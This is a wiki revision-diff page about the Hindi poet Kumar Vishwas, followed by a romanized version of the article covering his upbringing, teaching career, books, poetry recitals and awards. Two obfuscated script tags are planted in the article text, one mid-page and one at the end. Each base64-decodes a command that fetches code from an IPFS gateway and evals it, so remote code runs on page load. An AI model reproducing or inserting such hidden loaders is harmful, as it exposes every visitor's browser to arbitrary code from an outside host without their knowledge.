Difference between revisions of "कुमार विश्वास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "|language=हिन्दी" to "|language=हिन्दी")
m (Text replace - "|language=अंग्रेज़ी" to "|language=अंग्रेज़ी")
Line 38: Line 38:
 
डा. कुमार विश्वास ने अपना कैरियर [[राजस्थान]] में प्रवक्ता के रूप में [[1994]] में शुरू किया। तत्पश्वात वो अब तक महाविद्यालयों में अध्यापन कार्य कर रहे हैं। इसके साथ ही डा. विश्वास हिन्दी कविता मंच के सबसे व्यस्ततम कवियों में से हैं। उन्होंने अब तक हज़ारों कवि-सम्मेलनों में कविता पाठ किया है। साथ ही वह कई पत्रिकाओं में नियमित रूप से लिखते हैं। डा. विश्वास मंच के कवि होने के साथ साथ हिन्दी फ़िल्म इंडस्ट्री के गीतकार भी हैं। उनके द्वार लिखे गीत अगले कुछ दिनों में फ़िल्मों में दिखाई पड़ेगी। उन्होंने आदित्य दत्त की फ़िल्म 'चाय-गरम' में अभिनय भी किया है।
 
डा. कुमार विश्वास ने अपना कैरियर [[राजस्थान]] में प्रवक्ता के रूप में [[1994]] में शुरू किया। तत्पश्वात वो अब तक महाविद्यालयों में अध्यापन कार्य कर रहे हैं। इसके साथ ही डा. विश्वास हिन्दी कविता मंच के सबसे व्यस्ततम कवियों में से हैं। उन्होंने अब तक हज़ारों कवि-सम्मेलनों में कविता पाठ किया है। साथ ही वह कई पत्रिकाओं में नियमित रूप से लिखते हैं। डा. विश्वास मंच के कवि होने के साथ साथ हिन्दी फ़िल्म इंडस्ट्री के गीतकार भी हैं। उनके द्वार लिखे गीत अगले कुछ दिनों में फ़िल्मों में दिखाई पड़ेगी। उन्होंने आदित्य दत्त की फ़िल्म 'चाय-गरम' में अभिनय भी किया है।
 
==कार्य एवम उपलब्धियां==
 
==कार्य एवम उपलब्धियां==
विभिन्न पत्रिकाओं में नियमित रूप से छपने के अलावा डा कुमार विश्वास की दो पुस्तकें प्रकाशित हुई हैं- 'इक पगली लड़की के बिन' (1996) और 'कोई दीवाना कहता है' (2007 और 2010 दो संस्करण में) <ref>{{cite web |url=http://dpb.in/books/book/zb,,5e0_search_0_0_a_SU5S/Koi+Diwana+Kahta+hai/index.html |title=कोई दीवाना कहता है। |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format=एच.टी.एम.एल |publisher=डायमंड पब्लिकेशन |language=अंग्रेज़ी }}</ref>. विख्यात लेखक स्वर्गीय धर्मवीर भारती ने डा. विश्वास को इस पीढी का सबसे ज़्यादा सम्भावनाओं वाला कवि कहा है। प्रथम श्रेणी के हिन्दी गीतकार 'नीरज' जी ने उन्हें 'निशा-नियामक' की संज्ञा दी है। मशहूर हास्य कवि डा. सुरेन्द्र शर्मा ने उन्हें इस पीढी का एकमात्र आई एस ओ:2006 कवि कहा है।  
+
विभिन्न पत्रिकाओं में नियमित रूप से छपने के अलावा डा कुमार विश्वास की दो पुस्तकें प्रकाशित हुई हैं- 'इक पगली लड़की के बिन' (1996) और 'कोई दीवाना कहता है' (2007 और 2010 दो संस्करण में) <ref>{{cite web |url=http://dpb.in/books/book/zb,,5e0_search_0_0_a_SU5S/Koi+Diwana+Kahta+hai/index.html |title=कोई दीवाना कहता है। |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format=एच.टी.एम.एल |publisher=डायमंड पब्लिकेशन |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref>. विख्यात लेखक स्वर्गीय धर्मवीर भारती ने डा. विश्वास को इस पीढी का सबसे ज़्यादा सम्भावनाओं वाला कवि कहा है। प्रथम श्रेणी के हिन्दी गीतकार 'नीरज' जी ने उन्हें 'निशा-नियामक' की संज्ञा दी है। मशहूर हास्य कवि डा. सुरेन्द्र शर्मा ने उन्हें इस पीढी का एकमात्र आई एस ओ:2006 कवि कहा है।  
 
[[चित्र:Kumar-Vishwas-2.jpg|thumb|कुमार विश्वास<br /> Kumar Vishwas|left]]
 
[[चित्र:Kumar-Vishwas-2.jpg|thumb|कुमार विश्वास<br /> Kumar Vishwas|left]]
 
==मंच==
 
==मंच==
कवि-सम्मेलनों और मुशायरों के क्षेत्र में भी डा. विश्वास एक अग्रणी कवि हैं। वो अब तक हज़ारों कवि सम्मेलनों और मुशायरों में कविता-पाठ और संचालन कर चुके हैं। देश के सैकड़ों प्रतिष्ठित शिक्षण संस्थाओं में उनके एकल कार्यक्रम होते रहे हैं। इनमें आई आई टी [[खड़गपुर]], आई आई टी बी एच यू, आई एस एम [[धनबाद]], आई आई टी [[रूड़की]], आई आई टी भुवनेश्वर, आई आई एम लखनऊ <ref>{{cite web |url=http://iimlucknow.wordpress.com/page/4/ |title=द ऑफिशियल ब्लॉग ऑफ़ आई आई एम  लखनऊ |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=आई आई एम लखनऊ वर्ड्प्रेस |language=अंग्रेज़ी }}</ref>, एन आई टी जलंधर <ref>{{cite web |url=http://collegekhabar.com/events/utkansh-2010-nit-jalndhar/ |title=उत्कंश एन आई टी जलंधर प्रिजेन्स उत्कंश एनवल कल्चरल फेस्टिवल |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कॉलेजख़बर |language=अंग्रेज़ी }}</ref>, एन आई टी त्रिचि, इत्यादि कई संस्थान शामिल हैं। कई कार्पोरेट कंपनियों में भी डा. विश्वास को अक्सर कविता-पाठ के लिए बुलाया जाता है।
+
कवि-सम्मेलनों और मुशायरों के क्षेत्र में भी डा. विश्वास एक अग्रणी कवि हैं। वो अब तक हज़ारों कवि सम्मेलनों और मुशायरों में कविता-पाठ और संचालन कर चुके हैं। देश के सैकड़ों प्रतिष्ठित शिक्षण संस्थाओं में उनके एकल कार्यक्रम होते रहे हैं। इनमें आई आई टी [[खड़गपुर]], आई आई टी बी एच यू, आई एस एम [[धनबाद]], आई आई टी [[रूड़की]], आई आई टी भुवनेश्वर, आई आई एम लखनऊ <ref>{{cite web |url=http://iimlucknow.wordpress.com/page/4/ |title=द ऑफिशियल ब्लॉग ऑफ़ आई आई एम  लखनऊ |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=आई आई एम लखनऊ वर्ड्प्रेस |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref>, एन आई टी जलंधर <ref>{{cite web |url=http://collegekhabar.com/events/utkansh-2010-nit-jalndhar/ |title=उत्कंश एन आई टी जलंधर प्रिजेन्स उत्कंश एनवल कल्चरल फेस्टिवल |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कॉलेजख़बर |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref>, एन आई टी त्रिचि, इत्यादि कई संस्थान शामिल हैं। कई कार्पोरेट कंपनियों में भी डा. विश्वास को अक्सर कविता-पाठ के लिए बुलाया जाता है।
 
[[चित्र:Kumar-Vishwas-3.jpg|thumb|220px|कुमार विश्वास<br /> Kumar Vishwas]]
 
[[चित्र:Kumar-Vishwas-3.jpg|thumb|220px|कुमार विश्वास<br /> Kumar Vishwas]]
भारत के सैकड़ों छोटे-बड़े शहरों में कविता पाठ करने के अलावा उन्होंने कई अन्य देशों में भी अपनी काव्य-प्रतिभा का प्रदर्शन किया है। इनमें [[अमेरिका]], [[दुबई]] <ref>{{cite web |url=http://tn.exoticdubai.com/2009/01/indian-mushaira-in-dsf/ |title=इंडियन मुशाइरा इन डी एस एफ |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=एक्जोटिकदुबई |language=अंग्रेज़ी }}</ref>, [[मस्कट]], [[अबू धाबी]] और [[नेपाल]] जैसे देश शामिल हैं।
+
भारत के सैकड़ों छोटे-बड़े शहरों में कविता पाठ करने के अलावा उन्होंने कई अन्य देशों में भी अपनी काव्य-प्रतिभा का प्रदर्शन किया है। इनमें [[अमेरिका]], [[दुबई]] <ref>{{cite web |url=http://tn.exoticdubai.com/2009/01/indian-mushaira-in-dsf/ |title=इंडियन मुशाइरा इन डी एस एफ |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=एक्जोटिकदुबई |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref>, [[मस्कट]], [[अबू धाबी]] और [[नेपाल]] जैसे देश शामिल हैं।
 
==पुरस्कार==
 
==पुरस्कार==
 
1) डा कुंवर बेचैन काव्य-सम्मान एवम पुरस्कार समिति द्वारा 1994 में 'काव्य-कुमार पुरस्कार'
 
1) डा कुंवर बेचैन काव्य-सम्मान एवम पुरस्कार समिति द्वारा 1994 में 'काव्य-कुमार पुरस्कार'
 
2) साहित्य भारती, उन्नाव द्वारा 2004 में 'डा सुमन अलंकरण'
 
2) साहित्य भारती, उन्नाव द्वारा 2004 में 'डा सुमन अलंकरण'
3)हिन्दी-उर्दू अवार्ड अकादमी द्वारा 2006 में 'साहित्य-श्री'<ref>{{cite web |url=http://international.zeenews.com/inner1.asp?aid=197170&ssid=8&sid=ART |title=साहित्य शिरोमणि सम्मान फॉर गुलजार |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=अंतर्राष्ट्रीय ज़ी न्यूज़ |language=अंग्रेज़ी }}</ref>
+
3)हिन्दी-उर्दू अवार्ड अकादमी द्वारा 2006 में 'साहित्य-श्री'<ref>{{cite web |url=http://international.zeenews.com/inner1.asp?aid=197170&ssid=8&sid=ART |title=साहित्य शिरोमणि सम्मान फॉर गुलजार |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=अंतर्राष्ट्रीय ज़ी न्यूज़ |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref>
 
==अन्य सूचनाएं==
 
==अन्य सूचनाएं==
 
# डा कुमार विश्वास हिन्दी मंच के एकमात्र ऐसे कवि हैं, जिनकी कविता (बिना किसी वाद्य यंत्र के, अपने स्वर में) देश के प्राय: सभी बड़े मोबाईल आपरेटरों के कालर बैक ट्यून (काल करने वाले को सुनाई देने वाला ट्यून) में शामिल है।
 
# डा कुमार विश्वास हिन्दी मंच के एकमात्र ऐसे कवि हैं, जिनकी कविता (बिना किसी वाद्य यंत्र के, अपने स्वर में) देश के प्राय: सभी बड़े मोबाईल आपरेटरों के कालर बैक ट्यून (काल करने वाले को सुनाई देने वाला ट्यून) में शामिल है।
Line 65: Line 65:
 
{{cite web |url=http://www.youtube.com/watch?v=ufrHWVnPy8g |title=कविता डॉ. कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=युट्यूब |language= }}
 
{{cite web |url=http://www.youtube.com/watch?v=ufrHWVnPy8g |title=कविता डॉ. कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=युट्यूब |language= }}
 
{{cite web |url=http://www.kumarvishwas.com |title=डॉ. कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कुमार विश्वास |language=[[हिन्दी]] }}
 
{{cite web |url=http://www.kumarvishwas.com |title=डॉ. कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कुमार विश्वास |language=[[हिन्दी]] }}
{{cite web |url=http://www.kumarvishwas.com/information.eng.htm |title=डॉ. कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कुमार विश्वास |language=अंग्रेज़ी }}
+
{{cite web |url=http://www.kumarvishwas.com/information.eng.htm |title=डॉ. कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कुमार विश्वास |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}
 
{{cite web |url=http://www.kavitakosh.org/kk/index.php?title=%E0%A4%95%E0%A5%81%E0%A4%AE%E0%A4%BE%E0%A4%B0_%E0%A4%B5%E0%A4%BF%E0%A4%B6%E0%A5%8D%E0%A4%B5%E0%A4%BE%E0%A4%B8 |title=कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कविता कोश |language=[[हिन्दी]] }}
 
{{cite web |url=http://www.kavitakosh.org/kk/index.php?title=%E0%A4%95%E0%A5%81%E0%A4%AE%E0%A4%BE%E0%A4%B0_%E0%A4%B5%E0%A4%BF%E0%A4%B6%E0%A5%8D%E0%A4%B5%E0%A4%BE%E0%A4%B8 |title=कुमार विश्वास |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कविता कोश |language=[[हिन्दी]] }}
 
{{cite web |url=http://www.kavitakosh.org/kk/index.php?title=%E0%A4%95%E0%A5%81%E0%A4%AE%E0%A4%BE%E0%A4%B0_%E0%A4%B5%E0%A4%BF%E0%A4%B6%E0%A5%8D%E0%A4%B5%E0%A4%BE%E0%A4%B8_/_%E0%A4%AA%E0%A4%B0%E0%A4%BF%E0%A4%9A%E0%A4%AF |title=कुमार विश्वास / परिचय |accessmonthday=[[30 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कविता कोश |language=[[हिन्दी]] }}
 
{{cite web |url=http://www.kavitakosh.org/kk/index.php?title=%E0%A4%95%E0%A5%81%E0%A4%AE%E0%A4%BE%E0%A4%B0_%E0%A4%B5%E0%A4%BF%E0%A4%B6%E0%A5%8D%E0%A4%B5%E0%A4%BE%E0%A4%B8_/_%E0%A4%AA%E0%A4%B0%E0%A4%BF%E0%A4%9A%E0%A4%AF |title=कुमार विश्वास / परिचय |accessmonthday=[[30 जुलाई]] |accessyear=[[2010]] |authorlink= |format= |publisher=कविता कोश |language=[[हिन्दी]] }}

Revision as of 12:04, 8 March 2011

kumar vishvas
poora nam da. kumar vishvas
janm 10 faravari, san 1970 ee.
janm bhoomi pilakhua (gaziyabad, uttar pradesh)
karm-kshetr hindi kavita, kavisammelan
mukhy rachanaean 'ik pagali l daki ke bin' (1996) aur 'koee divana kahata hai' (2007 aur 2010 do sanskaran mean)
bhasha hindi bhasha
vidyalay lala ganga sahay skool, rajapootana rejimeant iantar k aaulej
puraskar-upadhi 'kavy-kumar puraskar', 'da suman alankaran', 'sahity-shri'
prasiddhi koee divana kahata hai (kavita)
nagarikata bharatiy
any janakari film 'chay-garam' mean abhinay bhi kiya
inhean bhi dekhean kavi soochi, sahityakar soochi

da kumar vishvas hindi bhasha ke ek agrani kavi haian. shrangar ras ke git inaki visheshata hai.

prarambhik jivan aur shiksha

kumar vishvas ka janm 10 faravari (vasant panchami), 1970 ko pilakhua (gaziyabad, uttar pradesh) mean hua tha. char bhaeeyoan aur ek bahan mean sabase chhote kumar vishvas ne apani prarambhik shiksha lala ganga sahay skool, pilakhua mean prapt ki. unake pita da. chandrapal sharma ar es es digri k aaulej (chaudhari charan sianh vishvavidyalay, merath se sambaddh), pilakhua mean pravakta rahe. unaki mata shrimati rama sharma grihini haian. rajapootana rejimeant iantar k aaulej se barahavian mean unake uttirn hone ke bad unake pita unhean ianjiniyar (abhiyanta) banana chahate the. da. kumar vishvas ka man mashinoan ki padhaee mean nahian rama, aur unhoanne bich mean hi vah padhaee chho d di. sahity ke kshetr mean age badhane ke khyal se unhoanne snatak aur phir hindi sahity mean snatakottar kiya, jisamean unhoanne svarn-padak prapt kiya. tatpshchat unhoanne "kauravi lokagitoan mean lokachetana" vishay par piechadi prapt kiya. unake is shodh-kary ko 2001 mean puraskrit bhi kiya gaya.

kairiyar

da. kumar vishvas ne apana kairiyar rajasthan mean pravakta ke roop mean 1994 mean shuroo kiya. tatpashvat vo ab tak mahavidyalayoan mean adhyapan kary kar rahe haian. isake sath hi da. vishvas hindi kavita manch ke sabase vyastatam kaviyoan mean se haian. unhoanne ab tak hazaroan kavi-sammelanoan mean kavita path kiya hai. sath hi vah kee patrikaoan mean niyamit roop se likhate haian. da. vishvas manch ke kavi hone ke sath sath hindi film iandastri ke gitakar bhi haian. unake dvar likhe git agale kuchh dinoan mean filmoan mean dikhaee p degi. unhoanne adity datt ki film 'chay-garam' mean abhinay bhi kiya hai.

kary evam upalabdhiyaan

vibhinn patrikaoan mean niyamit roop se chhapane ke alava da kumar vishvas ki do pustakean prakashit huee haian- 'ik pagali l daki ke bin' (1996) aur 'koee divana kahata hai' (2007 aur 2010 do sanskaran mean) [1]. vikhyat lekhak svargiy dharmavir bharati ne da. vishvas ko is pidhi ka sabase zyada sambhavanaoan vala kavi kaha hai. pratham shreni ke hindi gitakar 'niraj' ji ne unhean 'nisha-niyamak' ki sanjna di hai. mashahoor hasy kavi da. surendr sharma ne unhean is pidhi ka ekamatr aee es o:2006 kavi kaha hai. thumb|kumar vishvas
Kumar Vishwas|left

manch

kavi-sammelanoan aur mushayaroan ke kshetr mean bhi da. vishvas ek agrani kavi haian. vo ab tak hazaroan kavi sammelanoan aur mushayaroan mean kavita-path aur sanchalan kar chuke haian. desh ke saik doan pratishthit shikshan sansthaoan mean unake ekal karyakram hote rahe haian. inamean aee aee ti kh dagapur, aee aee ti bi ech yoo, aee es em dhanabad, aee aee ti roo daki, aee aee ti bhuvaneshvar, aee aee em lakhanoo [2], en aee ti jalandhar [3], en aee ti trichi, ityadi kee sansthan shamil haian. kee karporet kanpaniyoan mean bhi da. vishvas ko aksar kavita-path ke lie bulaya jata hai. thumb|220px|kumar vishvas
Kumar Vishwas
bharat ke saik doan chhote-b de shaharoan mean kavita path karane ke alava unhoanne kee any deshoan mean bhi apani kavy-pratibha ka pradarshan kiya hai. inamean amerika, dubee [4], maskat, aboo dhabi aur nepal jaise desh shamil haian.

puraskar

1) da kuanvar bechain kavy-samman evam puraskar samiti dvara 1994 mean 'kavy-kumar puraskar' 2) sahity bharati, unnav dvara 2004 mean 'da suman alankaran' 3)hindi-urdoo avard akadami dvara 2006 mean 'sahity-shri'[5]

any soochanaean

  1. da kumar vishvas hindi manch ke ekamatr aise kavi haian, jinaki kavita (bina kisi vady yantr ke, apane svar mean) desh ke pray: sabhi b de mobaeel aparetaroan ke kalar baik tyoon (kal karane vale ko sunaee dene vala tyoon) mean shamil hai.
  2. da vishvas iantaranet par sabase lokapriy kavi haian. arkut aur fesabuk par unaka prashansak parivar any kisi bhi kavi ke prashansak parivar se b da hai.
  3. vidiyo vebasaeet yoo-tyoob par da vishvas ki ek hi vidiyo ko paanch lakh se adhik bar dekha gaya hai, jo kisi bhi any kavi ke vidiyo se kee guna zyada hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. koee divana kahata hai. (aangrezi) (ech.ti.em.el) dayamand pablikeshan. abhigaman tithi: 28 julaee, 2010.
  2. d aauphishiyal bl aaug aauf aee aee em lakhanoo (aangrezi) aee aee em lakhanoo vardpres. abhigaman tithi: 28 julaee, 2010.
  3. utkansh en aee ti jalandhar prijens utkansh enaval kalcharal phestival (aangrezi) k aaulejakhabar. abhigaman tithi: 28 julaee, 2010.
  4. iandiyan mushaira in di es eph (aangrezi) ekjotikadubee. abhigaman tithi: 28 julaee, 2010.
  5. sahity shiromani samman ph aaur gulajar (aangrezi) aantarrashtriy zi nyooz. abhigaman tithi: 28 julaee, 2010.

bahari k diyaan

kavita d aau. kumar vishvas yutyoob. abhigaman tithi: 28 julaee, 2010.

d aau. kumar vishvas (hindi) kumar vishvas. abhigaman tithi: 28 julaee, 2010.

d aau. kumar vishvas (aangrezi) kumar vishvas. abhigaman tithi: 28 julaee, 2010.

kumar vishvas (hindi) kavita kosh. abhigaman tithi: 28 julaee, 2010.

kumar vishvas / parichay (hindi) kavita kosh. abhigaman tithi: 30 julaee, 2010.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>